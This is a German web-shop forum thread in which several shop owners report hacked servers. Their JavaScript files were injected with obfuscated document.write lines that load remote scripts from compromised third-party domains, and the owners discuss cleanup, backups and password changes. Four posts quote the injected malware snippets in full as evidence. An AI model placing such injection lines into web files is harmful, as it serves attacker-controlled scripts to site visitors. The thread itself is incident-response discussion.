Shop gehackt - Umleitung auf c2consultores.com.ar

[digicam]

Hallo Freunde,

ich bin nicht sicher, ob es nur bei mir so ist, aber in den ganzen Javascript-Files steht ganz unten der Eintrag:

Code: PHP  [Auswählen]

/*9e2d00*/

                                                                                                                                                                                         /*rabgrabg09212rabg09*/

document.write("<script type='text/javascript' src='http://c2consultores.com.ar/DQvZ6HwK.php?id=22720734'></"+ "script>");


/*/9e2d00*/
 

Schaut euch die ganzen js-Files unter /templates/xtc5/javascript/ mal an, hat jemand von euch auch diesen Eintrag?
Ich werde die js-Files alle säubern und die Berechtigung 444 vergeben, vorher hatten die 644 gehabt.
Gruß
digicam


Linkback: https://www.modified-shop.org/forum/index.php?topic=29534.0

[juergen-f]

Hi,

du bist nicht der einzige, der im Moment mit diesem Sche... zu kämpfen hat....
Bei mir haben sie in alle js-Dateien auf meinem Server (nicht nur in meinem Shop, sondern auch in allen anderen Projekten auf dem Server) mit folgenden Code verseucht:

Code: PHP  [Auswählen]

/*19f955*/

                                                                                                                                                                                         /*qbqb0904674qb09*/

document.write("<script type='text/javascript' src='http://rouladenroessl.de/images/bmvfhkJ7.php?id='></"+ "script>");


/*/19f955*/

 

Habe ein Serverbackup eingespielt und alle Passwörter geändert. Mal sehen, wie lange es diesmal dauert, bis wieder was passiert.
Letztes Jahr hatten die Penner alle index-Dateien beschmiert.

Gruß

Jürgen

[digicam]

Oh danke, ich dachte schon, dass nur ich wieder Pech habe. Wie haben es die bösen Buben geschafft? Ich hab die ganzen Server-Logs ausgewertet und nichts gefunden. Haben wir irgendwo einen Leck in der Modified?
Gruß
digicam

[Matt]

Vermutlich über ausgespähte FTP-Passwörter vom lokalen Rechner. Da der Schadcode so offensichtlich in den Files steht spricht das nicht dafür, dass man sich beim eigentlichen Angriff besonders viel Mühe gegeben hat.

[digicam]

Hi Matt, also meinst du dass ich trotz Virenscanner trotzdem einen Spion auf der Platte hab? Was kann ich dagegen tun?
Danke
digicam

[Matt]

Ja, das meine ich. Hast du mal das FTP-Log geprüft ob es da Logins zu Uhrzeiten gab, die unmöglich von dir sein können?

Was du dagegen tun kannst? Gute Frage, das sind hier eher die Leute gefordert, die sich mit Windows auskennen. Ich würde aber mal nen anderen Virenscanner versuchen.

[juergen-f]

Über "meine" FTP-Passwörter kann der Angriff (eigendlich) nicht gekommen sein, da auch vermieteter Webspace betroffen war, wo ich die Passwörter nicht mal kenne.
Irgendwie müssen die über das Server-Administratorpasswort auf den Server gekommen sein...
Nur werden bei mir keine Passwörter gespeichert. Auch die Virenscanner können nichts finden. Habe eben einen neuen Scanner durchlaufen lassen. Der hat ein paar infizierte Dateien gefunden...

Hoffe, auch die Datei, die Infos an diese Idioten schickt.....

Jürgen

[Belamcando]

Hallo, bei mir steht nun überall Folgendes in den js-Dateien:

/*ff3574*/
 /*pcpc092065pc09*/
document.write("<script type='text/javascript' src='http://sisteweb.it/yjHKQkFt.php?id=20088487'></"+ "script>");
/*/ff3574*/

Nur kenne ich mich leider nicht so gut aus, dass ich damit so "cool" umgehen kann wie Ihr anscheinend. Wäre dankbar für einen Tipp bzw. wohl mehrere Tipps, wie ich den Unfug wieder los werde? Das fängt schon mal damit an, dass ich gerne wüsste, welche Dateien überhaupt betroffen sein können. Und was heisst alle PW ändern? Auch das DB-Passwort? Dann muss die Shopkonfiguration auch neu gemacht werden, oder? PW für ftp-Zugang habe ich geändert, auch den Zugang zu phpmyadmin und das Admin-PW vom Shop selber. Die Sache macht mich gerade etwas nervös ...

Besten Dank schonmal,
Belamcando

[digicam]

Hallo Belamcando, so wie ich es sehe kommst du um eine Wiederherstellung aus deinem letzten Backup nicht herum. Bis jetzt habe ich alle js-Dateien mit dem heutigen Datum gefunden, die infiziert waren, also nicht nur im Template, sondern auch im /admin/includes/
Gruß
digicam

[digicam]

Benutzt einer vielleicht in Firefox das Add-On S3.Download Statusbar? Ich habe das Add-On in Verdacht, dass es meine gespeicherten Passwörter weiter gesendet hat. Kann es hier ein Betroffener bestätigen?
Danke
digicam

[Bonner]

Wie es scheint, bin ich ja nicht der Einzige der derzeit Probleme hat.

Code: PHP  [Auswählen]

;

/*f55735*/

                                                                                                                                                                                         /*ogajrogajr09883ogajr09*/

document.write("<script type='text/javascript' src='http://ergotronics.de/rnH7Vpfx.php?id=28427126'></"+ "script>");


/*/f55735*/
 

Hatte gestern ja auch eigentlich nix vor ....

Nach meinen Recherchen sind wohl alle Javascript Dateien befallen.

Alles platt gemacht, Backup eingespielt und es lief wieder.

Dann habe ich mich mal auf die Suche gemacht, wohin der ganze Mist geroutet wird..ergotronics hat eine IP, die auf eine Serverfarm im Münchener Raum verweist.
Wäre mal interessant zu wissen, wo bei den anderen Fällen die Server stehen.

Im Gespräch mit meinem Hoster habe ich dann mal die Sicherheitseinstellungen verschärft, was für mich bei Änderungen zwar umständlicher ist, aber die Arbeit gestern brauch ich nicht öfter!

Bonner

[Bonner]

Hab grad mal nachgeguckt...auch der Eintrag von jurgen-f verweist auf die gleicher Serverfarm

Netbeat Domain Hosting Farm in München

Bonner

[Gradler]

Dann wäre es doch wohl an der Zeit für Strafanzeigen.

[Bonner]

Ich hatte mal dran gedacht, ev. das BSI zu kontaktieren.

[Gradler]

Und jetzt willst Du warten bis die wieder so 'ne Webseite machen um dann durch Eintragung feststellen wollen ob Du auch wirklich gehackt wurdest?